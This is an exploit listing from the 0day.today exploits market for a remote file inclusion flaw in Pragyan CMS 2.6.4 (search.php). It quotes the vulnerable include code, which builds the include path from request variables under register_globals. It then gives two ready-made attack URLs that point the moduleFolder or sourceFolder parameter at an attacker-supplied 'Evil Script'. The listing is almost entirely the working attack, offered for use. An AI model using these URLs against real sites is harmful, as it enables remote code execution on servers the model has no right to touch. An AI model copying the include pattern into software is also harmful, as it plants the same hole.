[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability

Author
Mr.SeCreT
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10380
Category
web applications
Date add
24-12-2009
Platform
unsorted
==================================================================
Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability
==================================================================

############## Script Information: #########################
Scipt: Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability
Language: PHP
Download: http://garr.dl.sourceforge.net/project/pragyan/pragyan/2.6.4/pragyan-2.6.4.tar.gz
register_globals = On
 
################### Vul Code: ##############################
$searchModuleFolder = "$sourceFolder/$moduleFolder/search";
$include_dir = "$searchModuleFolder/include";
include ("$include_dir/commonfuncs.php");
 
################### Exploit: ###############################
www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil<http://www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil> Script]
www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil<http://www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil> Script]
 
############################################################



#  0day.today [2024-12-25]  #